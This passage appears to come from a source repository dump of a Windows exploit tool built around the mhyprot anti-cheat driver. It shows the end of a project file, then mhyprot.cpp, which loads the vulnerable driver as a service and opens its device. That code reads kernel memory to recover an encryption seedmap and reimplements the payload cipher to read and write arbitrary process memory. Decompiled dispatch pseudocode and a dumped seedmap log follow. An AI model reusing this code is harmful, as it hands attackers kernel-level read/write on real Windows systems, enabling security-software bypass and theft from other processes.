 94 |     <Link>
 95 |       <SubSystem>Console</SubSystem>
 96 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 97 |     </Link>
 98 |   </ItemDefinitionGroup>
 99 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
100 |     <ClCompile>
101 |       <WarningLevel>Level3</WarningLevel>
102 |       <FunctionLevelLinking>true</FunctionLevelLinking>
103 |       <IntrinsicFunctions>true</IntrinsicFunctions>
104 |       <SDLCheck>true</SDLCheck>
105 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
106 |       <ConformanceMode>true</ConformanceMode>
107 |     </ClCompile>
108 |     <Link>
109 |       <SubSystem>Console</SubSystem>
110 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
111 |       <OptimizeReferences>true</OptimizeReferences>
112 |       <GenerateDebugInformation>true</GenerateDebugInformation>
113 |     </Link>
114 |   </ItemDefinitionGroup>
115 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
116 |     <ClCompile>
117 |       <WarningLevel>Level3</WarningLevel>
118 |       <SDLCheck>true</SDLCheck>
119 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
120 |       <ConformanceMode>true</ConformanceMode>
121 |     </ClCompile>
122 |     <Link>
123 |       <SubSystem>Console</SubSystem>
124 |       <GenerateDebugInformation>true</GenerateDebugInformation>
125 |     </Link>
126 |   </ItemDefinitionGroup>
127 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
128 |     <ClCompile>
129 |       <WarningLevel>Level3</WarningLevel>
130 |       <FunctionLevelLinking>true</FunctionLevelLinking>
131 |       <IntrinsicFunctions>true</IntrinsicFunctions>
132 |       <SDLCheck>true</SDLCheck>
133 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
134 |       <ConformanceMode>true</ConformanceMode>
135 |       <LanguageStandard>stdcpp17</LanguageStandard>
136 |     </ClCompile>
137 |     <Link>
138 |       <SubSystem>Console</SubSystem>
139 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
140 |       <OptimizeReferences>true</OptimizeReferences>
141 |       <GenerateDebugInformation>true</GenerateDebugInformation>
142 |     </Link>
143 |   </ItemDefinitionGroup>
144 |   <ItemGroup>
145 |     <ClCompile Include="file_utils.cpp" />
146 |     <ClCompile Include="main.cpp" />
147 |     <ClCompile Include="mhyprot.cpp" />
148 |     <ClCompile Include="service_utils.cpp" />
149 |     <ClCompile Include="win_utils.cpp" />
150 |   </ItemGroup>
151 |   <ItemGroup>
152 |     <ClInclude Include="file_utils.hpp" />
153 |     <ClInclude Include="logger.hpp" />
154 |     <ClInclude Include="mhyprot.hpp" />
155 |     <ClInclude Include="nt.hpp" />
156 |     <ClInclude Include="raw_driver.hpp" />
157 |     <ClInclude Include="service_utils.hpp" />
158 |     <ClInclude Include="sup.hpp" />
159 |     <ClInclude Include="win_utils.hpp" />
160 |   </ItemGroup>
161 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
162 |   <ImportGroup Label="ExtensionTargets">
163 |   </ImportGroup>
164 | </Project>


--------------------------------------------------------------------------------
/src/mhyprot.cpp:
--------------------------------------------------------------------------------
  1 | #include "mhyprot.hpp"
  2 | 
  3 | //
  4 | // initialization of its service and device
  5 | //
  6 | bool mhyprot::init()
  7 | {
  8 |     logger::log("[>] loading vulnerable driver...\n");
  9 | 
 10 |     char temp_path[MAX_PATH];
 11 |     const uint32_t length = GetTempPath(sizeof(temp_path), temp_path);
 12 | 
 13 |     if (length > MAX_PATH || !length)
 14 |     {
 15 |         logger::log("[!] failed to obtain temp path. (0x%lX)\n", GetLastError());
 16 |         return false;
 17 |     }
 18 | 
 19 |     //
 20 |     // place the driver binary into the temp path
 21 |     //
 22 |     const std::string placement_path = std::string(temp_path) + MHYPROT_SYSFILE_NAME;
 23 | 
 24 |     if (std::filesystem::exists(placement_path))
 25 |     {
 26 |         std::remove(placement_path.c_str());
 27 |     }
 28 | 
 29 |     //
 30 |     // create driver sys from memory
 31 |     //
 32 |     if (!file_utils::create_file_from_buffer(
 33 |         placement_path,
 34 |         (void*)resource::raw_driver,
 35 |         sizeof(resource::raw_driver)
 36 |     ))
 37 |     {
 38 |         logger::log("[!] failed to prepare %s. (0x%lX)\n", MHYPROT_SYSFILE_NAME, GetLastError());
 39 |         return false;
 40 |     }
 41 | 
 42 |     logger::log("[>] preparing service...\n");
 43 |     
 44 |     //
 45 |     // create service using winapi, this needs administrator privileage
 46 |     //
 47 |     detail::mhyplot_service_handle = service_utils::create_service(placement_path);
 48 | 
 49 |     if (!CHECK_HANDLE(detail::mhyplot_service_handle))
 50 |     {
 51 |         logger::log("[!] failed to create service. (0x%lX)\n", GetLastError());
 52 |         return false;
 53 |     }
 54 | 
 55 |     //
 56 |     // start the service
 57 |     //
 58 |     if (!service_utils::start_service(detail::mhyplot_service_handle))
 59 |     {
 60 |         logger::log("[!] failed to start service. (0x%lX)\n", GetLastError());
 61 |         return false;
 62 |     }
 63 | 
 64 |     logger::log("[<] %s prepared\n", MHYPROT_SYSFILE_NAME);
 65 | 
 66 |     //
 67 |     // open the handle of its driver device
 68 |     //
 69 |     detail::device_handle = CreateFile(
 70 |         TEXT(MHYPROT_DEVICE_NAME),
 71 |         GENERIC_READ | GENERIC_WRITE,
 72 |         0,
 73 |         nullptr,
 74 |         OPEN_EXISTING,
 75 |         NULL,
 76 |         NULL
 77 |     );
 78 | 
 79 |     if (!CHECK_HANDLE(detail::device_handle))
 80 |     {
 81 |         logger::log("[!] failed to obtain device handle (0x%lX)\n", GetLastError());
 82 |         return false;
 83 |     }
 84 | 
 85 |     logger::log("[+] device handle snatched (0x%llX)\n", detail::device_handle);
 86 | 
 87 |     logger::log("[>] mhyprot initialized successfully\n");
 88 | 
 89 |     return true;
 90 | }
 91 | 
 92 | void mhyprot::unload()
 93 | {
 94 |     if (detail::device_handle)
 95 |     {
 96 |         CloseHandle(detail::device_handle);
 97 |     }
 98 | 
 99 |     if (detail::mhyplot_service_handle)
100 |     {
101 |         service_utils::stop_service(detail::mhyplot_service_handle);
102 |         service_utils::delete_service(detail::mhyplot_service_handle);
103 |     }
104 | }
105 | 
106 | //
107 | // send ioctl request to the vulnerable driver
108 | //
109 | bool mhyprot::driver_impl::request_ioctl(DWORD ioctl_code, LPVOID in_buffer, DWORD in_buffer_size)
110 | {
111 |     //
112 |     // allocate memory for this command result
113 |     //
114 |     LPVOID out_buffer = calloc(1, in_buffer_size);
115 |     DWORD out_buffer_size;
116 | 
117 |     if (!out_buffer)
118 |     {
119 |         return false;
120 |     }
121 |     
122 |     //
123 |     // send the ioctl request
124 |     //
125 |     const bool result = DeviceIoControl(
126 |         mhyprot::detail::device_handle,
127 |         ioctl_code,
128 |         in_buffer,
129 |         in_buffer_size,
130 |         out_buffer,
131 |         in_buffer_size,
132 |         &out_buffer_size,
133 |         NULL
134 |     );
135 | 
136 |     //
137 |     // store the result
138 |     //
139 |     if (out_buffer_size)
140 |     {
141 |         memcpy(in_buffer, out_buffer, out_buffer_size);
142 |     }
143 | 
144 |     free(out_buffer);
145 | 
146 |     return result;
147 | }
148 | 
149 | //
150 | // initialize driver implementations with payload encryption requirements
151 | //
152 | bool mhyprot::driver_impl::driver_init(bool debug_prints, bool print_seeds)
153 | {
154 |     logger::log("[>] initializing driver...\n");
155 | 
156 |     //
157 |     // the driver initializer
158 |     //
159 |     MHYPROT_INITIALIZE initializer;
160 |     initializer._m_002 = 0x0BAEBAEEC;
161 |     initializer._m_003 = 0x0EBBAAEF4FFF89042;
162 | 
163 |     if (!request_ioctl(MHYPROT_IOCTL_INITIALIZE, &initializer, sizeof(initializer)))
164 |     {
165 |         logger::log("[!] failed to initialize mhyplot driver implementation\n");
166 |         return false;
167 |     }
168 | 
169 |     //
170 |     // driver's base address in the system
171 |     //
172 |     uint64_t mhyprot_address = win_utils::
173 |         obtain_sysmodule_address(MHYPROT_SYSFILE_NAME, debug_prints);
174 | 
175 |     if (!mhyprot_address)
176 |     {
177 |         logger::log("[!] failed to locate mhyprot module address. (0x%lX)\n", GetLastError());
178 |         return false;
179 |     }
180 | 
181 |     logger::log("[+] %s is @ 0x%llX\n", MHYPROT_SYSFILE_NAME, mhyprot_address);
182 | 
183 |     //
184 |     // read the pointer that points to the seedmap that used to encrypt payloads
185 |     // the pointer on the [driver.sys + 0xA0E8]
186 |     //
187 |     uint64_t seedmap_address = driver_impl::
188 |         read_kernel_memory<uint64_t>(mhyprot_address + MHYPROT_OFFSET_SEEDMAP);
189 | 
190 |     logger::log("[+] seedmap in kernel [0x%llX + 0x%lX] @ (seedmap)0x%llX\n",
191 |         mhyprot_address, MHYPROT_OFFSET_SEEDMAP, seedmap_address);
192 | 
193 |     if (!seedmap_address)
194 |     {
195 |         logger::log("[!] failed to locate seedmap in kernel\n");
196 |         return false;
197 |     }
198 | 
199 |     //
200 |     // read the entire seedmap as size of 0x9C0
201 |     //
202 |     if (!driver_impl::read_kernel_memory(
203 |         seedmap_address,
204 |         &detail::seedmap,
205 |         sizeof(detail::seedmap)
206 |     ))
207 |     {
208 |         logger::log("[!] failed to pickup seedmap from kernel\n");
209 |         return false;
210 |     }
211 | 
212 |     for (int i = 0; i < (sizeof(detail::seedmap) / sizeof(detail::seedmap[0])); i++)
213 |     {
214 |         if (print_seeds)
215 |             logger::log("[+] seedmap (%05d): 0x%llX\n", i, detail::seedmap[i]);
216 |     }
217 | 
218 |     logger::log("[<] driver initialized successfully.\n");
219 | 
220 |     return true;
221 | }
222 | 
223 | //
224 | // generate a key for the payload
225 | //
226 | uint64_t mhyprot::driver_impl::generate_key(uint64_t seed)
227 | {
228 |     uint64_t k = ((((seed >> 29) & 0x555555555 ^ seed) & 0x38EB3FFFF6D3) << 17) ^ (seed >> 29) & 0x555555555 ^ seed;
229 |     return ((k & 0xFFFFFFFFFFFFBF77u) << 37) ^ k ^ ((((k & 0xFFFFFFFFFFFFBF77u) << 37) ^ k) >> 43);
230 | }
231 | 
232 | //
233 | // encrypt the payload
234 | //
235 | void mhyprot::driver_impl::encrypt_payload(void* payload, size_t size)
236 | {
237 |     if (size % 8)
238 |     {
239 |         logger::log("[!] (payload) size must be 8-byte alignment");
240 |         return;
241 |     }
242 | 
243 |     if (size / 8 >= 312)
244 |     {
245 |         logger::log("[!] (payload) size must be < 0x9C0");
246 |         return;
247 |     }
248 | 
249 |     uint64_t* p_payload = (uint64_t*)payload;
250 |     DWORD64 key_to_base = 0;
251 | 
252 |     for (DWORD i = 1; i < size / 8; i++)
253 |     {
254 |         const uint64_t key = driver_impl::generate_key(detail::seedmap[i - 1]);
255 |         p_payload[i] = p_payload[i] ^ key ^ (key_to_base + p_payload[0]);
256 |         key_to_base += 0x10;
257 |     }
258 | }
259 | 
260 | //
261 | // read memory from the kernel using vulnerable ioctl
262 | //
263 | bool mhyprot::driver_impl::read_kernel_memory(uint64_t address, void* buffer, size_t size)
264 | {
265 |     if (!buffer)
266 |     {
267 |         return false;
268 |     }
269 | 
270 |     DWORD payload_size = size + sizeof(DWORD);
271 |     PMHYPROT_KERNEL_READ_REQUEST payload = (PMHYPROT_KERNEL_READ_REQUEST)calloc(1, payload_size);
272 | 
273 |     if (!payload)
274 |     {
275 |         return false;
276 |     }
277 | 
278 |     payload->header.address = address;
279 |     payload->size = size;
280 | 
281 |     if (!request_ioctl(MHYPROT_IOCTL_READ_KERNEL_MEMORY, payload, payload_size))
282 |     {
283 |         return false;
284 |     }
285 | 
286 |     if (!payload->header.result)
287 |     {
288 |         memcpy(buffer, (PUCHAR)payload + 4, size);
289 |         return true;
290 |     }
291 | 
292 |     return false;
293 | }
294 | 
295 | //
296 | // read specific process memory from the kernel using vulnerable ioctl
297 | // let the driver to execute MmCopyVirtualMemory
298 | //
299 | bool mhyprot::driver_impl::read_user_memory(
300 |     uint32_t process_id, uint64_t address, void* buffer, size_t size
301 | )
302 | {
303 |     MHYPROT_USER_READ_WRITE_REQUEST payload;
304 |     payload.action = MHYPROT_ACTION_READ;   // action code
305 |     payload.process_id = process_id;        // target process id
306 |     payload.address = address;              // address
307 |     payload.buffer = (uint64_t)buffer;      // our buffer
308 |     payload.size = size;                    // size
309 | 
310 |     encrypt_payload(&payload, sizeof(payload));
311 | 
312 |     return request_ioctl(
313 |         MHYPROT_IOCTL_READ_WRITE_USER_MEMORY,
314 |         &payload,
315 |         sizeof(payload)
316 |     );
317 | }
318 | 
319 | //
320 | // write specific process memory from the kernel using vulnerable ioctl
321 | // let the driver to execute MmCopyVirtualMemory
322 | //
323 | bool mhyprot::driver_impl::write_user_memory(
324 |     uint32_t process_id, uint64_t address, void* buffer, size_t size
325 | )
326 | {
327 |     MHYPROT_USER_READ_WRITE_REQUEST payload;
328 |     payload.action = MHYPROT_ACTION_WRITE;  // action code
329 |     payload.process_id = process_id;        // target process id
330 |     payload.address = (uint64_t)buffer;     // our buffer
331 |     payload.buffer = address;               // destination
332 |     payload.size = size;                    // size
333 | 
334 |     encrypt_payload(&payload, sizeof(payload));
335 | 
336 |     return request_ioctl(
337 |         MHYPROT_IOCTL_READ_WRITE_USER_MEMORY,
338 |         &payload,
339 |         sizeof(payload)
340 |     );
341 | }
342 | 


--------------------------------------------------------------------------------
/IDA/FUN_0001d000.cpp:
--------------------------------------------------------------------------------
  1 | //
  2 | // Pseudocode
  3 | //
  4 | 
  5 | ulonglong IOCTL_FUN_0001d000(
  6 | uint param_1,
  7 | ulonglong *param_2,
  8 | uint param_3,
  9 | ulonglong **param_4,
 10 | int *param_5
 11 | )
 12 | {
 13 |   int iVar1;
 14 |   bool bVar2;
 15 |   int *piVar3;
 16 |   uint uVar4;
 17 |   uint uVar5;
 18 |   ulonglong uVar6;
 19 |   ulonglong *puVar7;
 20 |   uint **ppuVar8;
 21 |   ulonglong uVar9;
 22 |   int **ppiVar10;
 23 |   uint unaff_EDI;
 24 |   undefined8 uVar11;
 25 |   ulonglong **ppuVar12;
 26 |   uint *puVar13;
 27 |   undefined8 extraout_XMM0_Qb;
 28 |   uint local_res20 [2];
 29 |   undefined4 *local_2b8;
 30 |   undefined4 in_stack_fffffffffffffd50;
 31 |   undefined4 in_stack_fffffffffffffd54;
 32 |   ulonglong *puVar14;
 33 |   ulonglong *local_2a8;
 34 |   undefined4 uStack672;
 35 |   undefined4 uStack668;
 36 |   uint *puStack664;
 37 |   undefined4 uStack656;
 38 |   undefined4 uStack652;
 39 |   undefined4 uStack648;
 40 |   undefined4 uStack644;
 41 |   undefined4 uStack640;
 42 |   undefined4 uStack636;
 43 |   undefined8 uStack632;
 44 |   undefined4 uStack616;
 45 |   undefined4 uStack612;
 46 |   undefined4 uStack608;
 47 |   undefined4 uStack604;
 48 |   undefined4 uStack600;
 49 |   undefined4 uStack596;
 50 |   undefined4 uStack592;
 51 |   undefined4 uStack588;
 52 |   undefined8 uStack584;
 53 |   int *apiStack568 [66];
 54 |   
 55 |   piVar3 = param_5;
 56 |   uVar6 = (ulonglong)param_3;
 57 |   *param_4 = (ulonglong *)0x0;
 58 |   puVar13 = local_res20;
 59 |   local_2a8 = (ulonglong *)0x0;
 60 |   ppuVar12 = (ulonglong **)&stack0xfffffffffffffd58;
 61 |   local_res20[0] = 0;
 62 |   iVar1 = 0;
 63 |   if (unaff_EDI != 0) {
 64 |     while ((unaff_EDI >> iVar1 & 1) == 0) {
 65 |       iVar1 = iVar1 + 1;
 66 |     }
 67 |   }
 68 |   local_2b8 = &DAT_0001a0e8;
 69 |   *param_5 = 0;
 70 |   bVar2 = false;
 71 |   uVar9 = FUN_00012134(param_2,param_3,ppuVar12,puVar13,&DAT_0001a0e8);
 72 |   if ((((int)uVar9 == 0) || (local_2a8 == (ulonglong *)0x0)) || (local_res20[0] == 0)) {
 73 |     bVar2 = true;
 74 |     local_res20[0] = param_3;
 75 |     local_2a8 = param_2;
 76 |   }
 77 |   if (bVar2) {
 78 |     return uVar9 & 0xffffffffffffff00;
 79 |   }
 80 |   puVar14 = local_2a8;
 81 |   if (param_1 < 0x81104001) {
 82 |     if (param_1 == 0x81104000) {
 83 |       param_5 = (int *)FUN_00016834(*(uint *)local_2a8);
 84 | LAB_0001d33a:
 85 |       ppiVar10 = &param_5;
 86 |       uVar5 = 8;
 87 |       goto LAB_0001d5f0;
 88 |     }
 89 |     puVar7 = (ulonglong *)0x81054000;
 90 |     if (0x81054000 < param_1) {
 91 |       if (param_1 == 0x81064000) {
 92 |         uVar6 = FUN_00013614(*(uint *)local_2a8,uVar6,ppuVar12,puVar13);
 93 |         uVar5 = (uint)uVar6;
 94 | LAB_0001d2e9:
 95 |         param_5 = (int *)CONCAT44(param_5._4_4_,uVar5);
 96 |       }
 97 |       else {
 98 |         if (param_1 == 0x81074000) {
 99 |           param_5 = (int *)((ulonglong)param_5._4_4_ << 0x20);
100 |           DispatchReadUserMemory_FUN_00014214((int *)local_2a8,(undefined4 *)&param_5);
101 |         }
102 |         else {
103 |           if (param_1 != 0x81084000) {
104 |             if (param_1 != 0x81094000) goto LAB_0001d62b;
105 |             uVar6 = FUN_000135b0(*(uint *)local_2a8,uVar6,ppuVar12,puVar13);
106 |             uVar5 = (uint)uVar6;
107 |             goto LAB_0001d2e9;
108 |           }
109 |           param_5 = (int *)CONCAT44(param_5._4_4_,0x133ecf0);
110 |         }
111 |       }
112 | LAB_0001d21c:
113 |       uVar5 = 4;
114 |       ppiVar10 = &param_5;
115 |       goto LAB_0001d5f0;
116 |     }
117 |     if (param_1 == 0x81054000) {
118 |       uVar5 = *(uint *)((longlong)local_2a8 + 4);
119 |       uVar4 = *(uint *)local_2a8;
120 |       puVar7 = (ulonglong *)ExAllocatePool(0,(ulonglong)uVar5 * 0x318 + 4);
121 |       uVar6 = FUN_0001274c(uVar4,(longlong)puVar7 + 4,uVar5);
122 |       uVar4 = (uint)uVar6;
123 |       *(uint *)puVar7 = uVar4;
124 |       if (uVar5 < uVar4) {
125 |         uVar4 = uVar5;
126 |       }
127 |       puStack664 = (uint *)CONCAT44(DAT_0001a0ec,DAT_0001a0e8);
128 |       uStack656 = DAT_0001a0f0;
129 |       uStack652 = DAT_0001a0f4;
130 |       uStack648 = DAT_0001a0f8;
131 |       uStack644 = DAT_0001a0fc;
132 |       uStack640 = DAT_0001a100;
133 |       uStack636 = DAT_0001a104;
134 |       uStack632 = DAT_0001a108;
135 |       FUN_00012270(puVar7,uVar4 * 0x318 + 4,param_4,piVar3,&puStack664);
136 |       puVar14 = local_2a8;
137 | LAB_0001d2ac:
138 |       puVar7 = (ulonglong *)ExFreePoolWithTag(puVar7,0);
139 |       goto LAB_0001d62b;
140 |     }
141 |     if (param_1 == 0x80024000) {
142 |       FUN_000148fc(*(uint *)local_2a8);
143 |       param_5 = (int *)((ulonglong)param_5 & 0xffffffff00000000);
144 |       goto LAB_0001d21c;
145 |     }
146 |     if (param_1 == 0x81004000) {
147 |       uVar11 = 0x20;
148 |       FUN_00017900((undefined4 *)&uStack616,0,0x20);
149 |       puVar7 = (ulonglong *)FUN_00014310((longlong *)local_2a8,&uStack616,uVar11,puVar13);
150 |       puVar14 = local_2a8;
151 |       if ((int)puVar7 != 0) goto LAB_0001d62b;
152 |       goto LAB_0001d5e9;
153 |     }
154 |     if (param_1 == 0x81014000) {
155 |       FUN_0001696c(*(uint *)local_2a8);
156 |       uVar6 = FUN_00016994();
157 |       param_5 = (int *)((ulonglong)param_5 & 0xffffffff00000000 | (ulonglong)((char)uVar6 == '\x01')
158 |                        );
159 | LAB_0001d17f:
160 |       ppuVar8 = (uint **)&uStack616;
161 |       uVar5 = 4;
162 |       ppiVar10 = &param_5;
163 |       uStack616 = DAT_0001a0e8;
164 |       uStack612 = DAT_0001a0ec;
165 |       uStack608 = DAT_0001a0f0;
166 |       uStack604 = DAT_0001a0f4;
167 |       uStack584 = DAT_0001a108;
168 |       uStack600 = DAT_0001a0f8;
169 |       uStack596 = DAT_0001a0fc;
170 |       uStack592 = DAT_0001a100;
171 |       uStack588 = DAT_0001a104;
172 |     }
173 |     else {
174 |       if (param_1 == 0x81034000) {
175 |         thunk_FUN_000136b0(*(uint *)local_2a8);
176 |         param_5 = (int *)((ulonglong)param_5 & 0xffffffff00000000);
177 |         goto LAB_0001d17f;
178 |       }
179 |       if (param_1 != 0x81044000) goto LAB_0001d62b;
180 |       uVar5 = *(uint *)local_2a8;
181 |       FUN_00017900((undefined4 *)apiStack568,0,0x208);
182 |       FUN_00013bfc(uVar5,apiStack568,0x104,puVar13);
183 |       ppuVar8 = (uint **)&uStack616;
184 |       uVar5 = 0x208;
185 |       ppiVar10 = apiStack568;
186 |       uStack616 = DAT_0001a0e8;
187 |       uStack612 = DAT_0001a0ec;
188 |       uStack608 = DAT_0001a0f0;
189 |       uStack604 = DAT_0001a0f4;
190 |       uStack584 = DAT_0001a108;
191 |       uStack600 = DAT_0001a0f8;
192 |       uStack596 = DAT_0001a0fc;
193 |       uStack592 = DAT_0001a100;
194 |       uStack588 = DAT_0001a104;
195 |     }
196 |   }
197 |   else {
198 |     puVar7 = (ulonglong *)0x82044000;
199 |     if (param_1 < 0x82044001) {
200 |       if (param_1 == 0x82044000) {
201 |         FUN_00017900((undefined4 *)&uStack616,0,0x20);
202 |         FUN_00016268();
203 |       }
204 |       else {
205 |         if (param_1 == 0x81114000) {
206 |           param_5 = (int *)FUN_00013d44(*(uint *)local_2a8);
207 |           goto LAB_0001d33a;
208 |         }
209 |         if (param_1 == 0x81124000) {
210 |           FUN_000996ed(&LAB_0001db10,uVar6,(ulonglong)ppuVar12);
211 |           FUN_000b7de0();
212 |           uStack672 = (undefined4)extraout_XMM0_Qb;
213 |           uStack668 = (undefined4)((ulonglong)extraout_XMM0_Qb >> 0x20);
214 |           FUN_000cf4a3();
215 |           puStack664 = (uint *)FUN_000add98(DAT_0001a108);
216 |           FUN_000cf4a3();
217 |           uVar6 = FUN_0004609e();
218 |           return uVar6;
219 |         }
220 |         if (param_1 == 0x82004000) {
221 |           param_5 = (int *)((ulonglong)param_5._4_4_ << 0x20);
222 |           FUN_00016408(local_2a8[2],local_2a8[1],*local_2a8,puVar13,local_2b8,
223 |                        (uint *)CONCAT44(in_stack_fffffffffffffd54,in_stack_fffffffffffffd50),
224 |                        local_2a8);
225 |           goto LAB_0001d21c;
226 |         }
227 |         if (param_1 == 0x82014000) {
228 |           FUN_00017900((undefined4 *)&uStack616,0,0x20);
229 |           FUN_00015fa0();
230 |         }
231 |         else {
232 |           if (param_1 != 0x82024000) goto LAB_0001d62b;
233 |           FUN_00017900((undefined4 *)&uStack616,0,0x20);
234 |           FUN_00015f1c();
235 |         }
236 |       }
237 |     }
238 |     else {
239 |       if (param_1 == 0x82054000) {
240 |         FUN_00017900((undefined4 *)&uStack616,0,0x20);
241 |         FUN_000161bc(local_2a8,(int)register0x00000020 - 0x268);
242 |       }
243 |       else {
244 |         if (param_1 != 0x82064000) {
245 |           if (param_1 == 0x82114000) {
246 |             puVar7 = local_2a8;
247 |             if ((*(uint *)local_2a8 ^ 0xbaebaeec) != DAT_0001a688) goto LAB_0001d62b;
248 |             uVar5 = DAT_0001a6ec ^ DAT_0001a688;
249 |             goto LAB_0001d2e9;
250 |           }
251 |           if (((param_1 != 0x83014000) || (*(uint *)local_2a8 != 0x88)) ||
252 |              (puVar7 = (ulonglong *)
253 |                        ExAllocatePool(0,(ulonglong)*(uint *)((longlong)local_2a8 + 4) * 0x2a8 + 4),
254 |              puVar7 == (ulonglong *)0x0)) goto LAB_0001d62b;
255 |           uVar6 = FUN_00016038((longlong)puVar7 + 4,(int *)local_2a8);
256 |           uVar5 = (uint)uVar6;
257 |           *(uint *)puVar7 = uVar5;
258 |           if (*(uint *)((longlong)local_2a8 + 4) < uVar5) {
259 |             uVar5 = *(uint *)((longlong)local_2a8 + 4);
260 |           }
261 |           puStack664 = (uint *)CONCAT44(DAT_0001a0ec,DAT_0001a0e8);
262 |           uStack656 = DAT_0001a0f0;
263 |           uStack652 = DAT_0001a0f4;
264 |           uStack648 = DAT_0001a0f8;
265 |           uStack644 = DAT_0001a0fc;
266 |           uStack640 = DAT_0001a100;
267 |           uStack636 = DAT_0001a104;
268 |           uStack632 = DAT_0001a108;
269 |           FUN_00012270(puVar7,uVar5 * 0x2a8 + 4,param_4,piVar3,&puStack664);
270 |           goto LAB_0001d2ac;
271 |         }
272 |         FUN_00017900((undefined4 *)&uStack616,0,0x20);
273 |         FUN_0001630c((longlong)local_2a8,(undefined4 *)&uStack616);
274 |       }
275 |     }
276 | LAB_0001d5e9:
277 |     ppiVar10 = (int **)&uStack616;
278 |     uVar5 = 0x20;
279 | LAB_0001d5f0:
280 |     ppuVar8 = &puStack664;
281 |     puStack664 = (uint *)CONCAT44(DAT_0001a0ec,DAT_0001a0e8);
282 |     uStack656 = DAT_0001a0f0;
283 |     uStack652 = DAT_0001a0f4;
284 |     uStack632 = DAT_0001a108;
285 |     uStack648 = DAT_0001a0f8;
286 |     uStack644 = DAT_0001a0fc;
287 |     uStack640 = DAT_0001a100;
288 |     uStack636 = DAT_0001a104;
289 |   }
290 |   puVar7 = (ulonglong *)FUN_00012270(ppiVar10,uVar5,param_4,piVar3,ppuVar8);
291 |   puVar14 = local_2a8;
292 | LAB_0001d62b:
293 |   if (puVar14 != (ulonglong *)0x0) {
294 |     puVar7 = (ulonglong *)ExFreePoolWithTag(puVar14,0);
295 |   }
296 |   return CONCAT71((int7)((ulonglong)puVar7 >> 8),1);
297 | }
298 | 


--------------------------------------------------------------------------------
/seedmap.txt:
--------------------------------------------------------------------------------
  1 | [+] seedmap (00000): 0x4068070C4A24D178
  2 | [+] seedmap (00001): 0x6999A42A61B1639
  3 | [+] seedmap (00002): 0xDC4C2DCFD11B8DA
  4 | [+] seedmap (00003): 0x27F5358F1F77E613
  5 | [+] seedmap (00004): 0x88D2F57392877EDE
  6 | [+] seedmap (00005): 0xB5F18A5B915E6DFA
  7 | [+] seedmap (00006): 0x26AD046BB9DCD500
  8 | [+] seedmap (00007): 0xADDA7D3385D88A1F
  9 | [+] seedmap (00008): 0x489C7A2A4A3FE1FA
 10 | [+] seedmap (00009): 0x711452BAA1665F27
 11 | [+] seedmap (00010): 0xDDD6CDCD2DB6FB3C
 12 | [+] seedmap (00011): 0xEE130174D3DA0DED
 13 | [+] seedmap (00012): 0x45F28155996C409D
 14 | [+] seedmap (00013): 0xB0791462FB20F727
 15 | [+] seedmap (00014): 0x69DE7BD9173E15B6
 16 | [+] seedmap (00015): 0x85B0D332D20319EB
 17 | [+] seedmap (00016): 0x6F6FD87A047B8098
 18 | [+] seedmap (00017): 0x2355E1231B8BB6BB
 19 | [+] seedmap (00018): 0xB5E03F628EFC41E5
 20 | [+] seedmap (00019): 0x5600A8A882512979
 21 | [+] seedmap (00020): 0x22B482775C3F3499
 22 | [+] seedmap (00021): 0x384ECB4164B271A4
 23 | [+] seedmap (00022): 0x42A209292A03F0E9
 24 | [+] seedmap (00023): 0xB06BE8838253E6AB
 25 | [+] seedmap (00024): 0x1485F1760292C71B
 26 | [+] seedmap (00025): 0xEA88DB5DEE3A4626
 27 | [+] seedmap (00026): 0xA98B9D06EF4EFAE
 28 | [+] seedmap (00027): 0xB74067BF63CA5DDB
 29 | [+] seedmap (00028): 0x60CE34B9A7C71925
 30 | [+] seedmap (00029): 0xA6F0E1917CD0A9CB
 31 | [+] seedmap (00030): 0xF423E49A394ADF36
 32 | [+] seedmap (00031): 0x134E5130AC489E2B
 33 | [+] seedmap (00032): 0xBC26355A38BFF31F
 34 | [+] seedmap (00033): 0x5385BEA7161DCCB0
 35 | [+] seedmap (00034): 0x66B8C4197D069B39
 36 | [+] seedmap (00035): 0x3E6C0D813C18CF6
 37 | [+] seedmap (00036): 0x1F62FA9E3FA45F17
 38 | [+] seedmap (00037): 0x8E4F30793B7DE1CF
 39 | [+] seedmap (00038): 0x3C2CD1ADBEABC5F1
 40 | [+] seedmap (00039): 0x6230E7EEB78CF9C0
 41 | [+] seedmap (00040): 0x673A319E34014259
 42 | [+] seedmap (00041): 0xD219EA1CE57D1178
 43 | [+] seedmap (00042): 0xB3B726B418AA1576
 44 | [+] seedmap (00043): 0x4875DB1D7D77743D
 45 | [+] seedmap (00044): 0xFFF84B1C618B8D0E
 46 | [+] seedmap (00045): 0x2E2D99BC07CE36D3
 47 | [+] seedmap (00046): 0x8FF0275A567CD4C7
 48 | [+] seedmap (00047): 0x6DD8C705F257436
 49 | [+] seedmap (00048): 0x45A768A36B14EE6
 50 | [+] seedmap (00049): 0xB203641046C2030
 51 | [+] seedmap (00050): 0x2E44072CF872115F
 52 | [+] seedmap (00051): 0xA2DADAB0245AFA93
 53 | [+] seedmap (00052): 0x3788DB3419D7CE35
 54 | [+] seedmap (00053): 0xECFF1EC16BFDDE6C
 55 | [+] seedmap (00054): 0xEE2B04207D1B6FC2
 56 | [+] seedmap (00055): 0x3CF961415CEB8B5C
 57 | [+] seedmap (00056): 0xF2CB32B581D323BD
 58 | [+] seedmap (00057): 0xE54977E1599520DD
 59 | [+] seedmap (00058): 0x4E90B385E19E755F
 60 | [+] seedmap (00059): 0xB40697E098F3A756
 61 | [+] seedmap (00060): 0xA095F2B551B5921E
 62 | [+] seedmap (00061): 0x56BDA82AEB40D24
 63 | [+] seedmap (00062): 0x9F87D8792A74A1DD
 64 | [+] seedmap (00063): 0x5A8E56903E44A7D3
 65 | [+] seedmap (00064): 0x76FBBF43D68FB0F8
 66 | [+] seedmap (00065): 0x7101B715AC2E837A
